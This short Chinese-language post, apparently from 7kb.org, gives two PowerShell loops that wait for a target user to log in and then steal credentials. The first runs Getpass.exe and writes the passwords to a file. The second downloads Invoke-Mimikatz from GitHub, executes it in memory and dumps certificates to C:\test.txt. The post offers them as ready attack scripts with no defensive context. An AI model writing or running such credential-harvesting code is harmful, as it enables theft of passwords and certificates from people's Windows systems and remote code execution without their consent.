while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #执行程序 Getpass.exe >>C:\test.txt } #时间单位毫秒 sleep -mill 3600000 }
while($true){ //执行的命令 $a=query user #从返回结果里检查关键字 if([string]$a -like "*关键字*") { #下载执行Mimikatz IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts >>C:\test.txt } #时间单位毫秒 sleep -mill 3600000 }
7kb.org 原创,如有转载请注明出处 www.7kb.org